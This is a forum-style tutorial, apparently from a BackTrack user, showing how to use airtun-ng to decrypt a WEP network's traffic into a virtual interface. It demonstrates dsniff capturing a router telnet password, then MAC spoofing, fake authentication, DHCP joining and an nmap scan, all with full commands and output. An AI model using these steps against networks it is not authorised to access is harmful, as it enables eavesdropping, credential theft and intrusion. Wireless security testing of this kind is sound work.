In this post I will show you how you can use airtun-ng to create a virtual interface which will allow you to monitor WLAN traffic in real-time with an IDS or other packet sniffer, and at the same time, use the virtual interface to inject traffic and essentially become a client of the network.

The following is the info for the AP in this demonstration:

essid: airtun-demo
mac: 00:18:F8:F0:00:01
wep: 5CE6A435786A4135A512EB6FB5
channel: 11

The first thing we will do is make sure our card is in monitor mode on the appropriate channel:
Code:
airmon-ng stop ath0
airmon-ng start wifi0 11
Then we will run the following airtun-ng command:
Code:
bt ~ # airtun-ng -a 00:18:F8:F0:00:01 -w 5CE6A435786A4135A512EB6FB5 -t 1 ath0
created tap interface at0
WEP encryption specified. Sending and receiving frames through ath0.
ToDS bit set in all frames.
"-a" specifies the bssid of the target AP and "-w" is the WEP (I am assuming you already cracked/know it for this example). One important thing is the "-t" option. I specified a value of 1 for this example because I just want to communicate with the AP and/or wired clients. If you change it to 0 this should allow you to communicate with wireless clients. Try playing with this setting if you cannot reach certain hosts.

Also, if you receive the following error message...
Code:
error opening tap device: No such file or directory
try "modprobe tun"
error opening tap device: No such file or directory
...just run "modprobe tun" from the shell before starting airtun-ng.


So now that airtun-ng is running, we can now use any packet capture utility we want to monitor the wireless traffic. This could be your snort IDS software, wireshark for analysis, driftnet to be creepy and grab web pics . I used dsniff here to grab a telnet password to the wireless router:
Code:
bt ~ # dsniff -i at0
dsniff: listening on at0

-----------------
03/07/09 20:15:19 tcp 192.168.1.105.49895 -> DD-WRT.23 (telnet)
root
admin
Normally, utilities like these would give you "unknown data-link type" errors when trying to start the capture, but the at0 interface created by airtun-ng replays all traffic for us, decrypted with the WEP, and with the 802.11 info removed so it is now a standard ethernet in the eyes of our sniffer programs.

Well, this is spectacular, but what if you want to take it further? You can't scan the network or perform MITM attacks without being able to send packets into the network. I guess you could always just use another wireless interface for this part, but that would defeat the purpose of this "how-to"! Also, if you are having trouble connecting to WEP networks with your current card driver, you could actually tunnel all your traffic through airtun-ng and take your driver limitations out of the equation (assuming your card supports injection). Plus, some people may only have 1 interface to work with.

First, we need to clone the mac of our interface we are using to capture the wireless traffic, and assign it to our at0 interface. Otherwise, the AP will not know what to do with our packets once it receives them. It needs to know the actual physical interface to respond to.
Code:
bt ~ # ifconfig ath0

ath0      Link encap:UNSPEC  HWaddr 00-15-6D-54-00-01-A8-0F-00-00-00-00-00-00-00-00
          UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI  MTU:1500  Metric:1
          RX packets:11808 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2880777 (2.7 MiB)  TX bytes:227 (227.0 b)
^^ Checking the ath0 MAC

Now let's assign to our tunnel interface...
Code:
bt ~ # macchanger -m 00:15:6D:54:00:01 at0
Current MAC: 82:cf:78:7e:22:22 (unknown)
Faked MAC:   00:15:6d:54:00:01 (unknown)
Now it is assigned to our virtual interface.

And 1 final requirement before we can inject traffic, we need to associate ourselves with the target AP. For this we will use a simple command with aireplay-ng.
Code:
bt ~ # aireplay-ng -a 00:18:F8:F0:00:01 --fakeauth 5 ath0
No source MAC (-h) specified. Using the device MAC (00:15:6D:54:00:01)
20:13:05  Waiting for beacon frame (BSSID: 00:18:F8:F0:00:01) on channel 11

20:13:06  Sending Authentication Request (Open System) [ACK]
20:13:06  Authentication successful
20:13:06  Sending Association Request [ACK]
20:13:06  Association successful :-) (AID: 1)
"-a" is the bssid of our target AP, "--fakeauth 5" says to associate every 5 seconds, and ath0 is our replay interface.

Now we are good to go.

Let's bring up the at0 interface... (airtun-ng will always start with the interface down)
Code:
ifconfig at0 up
Let's see if the AP will give us an address via DHCP.

Code:
bt ~ # dhcpcd at0
bt ~ # ifconfig at0
at0       Link encap:Ethernet  HWaddr 00:15:6D:54:00:01
          inet addr:192.168.1.109  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:11 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500
          RX bytes:3290 (3.2 KiB)  TX bytes:1240 (1.2 KiB)
Ta-da! We are now sniffing all wireless traffic for this AP in promiscuous mode, and are also joined to the network and can inject and receive packets like a normal host. All with the same physical interface.


Pinging the AP...
Code:
bt ~ # ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=4.98 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=2.33 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=2.34 ms
64 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=2.32 ms
64 bytes from 192.168.1.1: icmp_seq=5 ttl=64 time=2.33 ms

--- 192.168.1.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4001ms
rtt min/avg/max/mdev = 2.321/2.863/4.984/1.060 ms
A quick port scan...
Code:
bt ~ # nmap -e at0 -F 192.168.1.1

Starting Nmap 4.85BETA3 ( hxxp://nmap.org ) at 2009-03-07 20:19 GMT
Interesting ports on DD-WRT (192.168.1.1):
Not shown: 97 closed ports
PORT   STATE SERVICE
23/tcp open  telnet
53/tcp open  domain
80/tcp open  http
MAC Address: 00:18:F8:FC:00:A0 (Cisco-Linksys)

Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
You will probably need to specify the interface to use for scanning with nmap. When I didn't it would give me an error and default to eth0. This may be the case with other programs also.



So there you have it. If anyone has any pointers or criticisms please let me know. Thanks.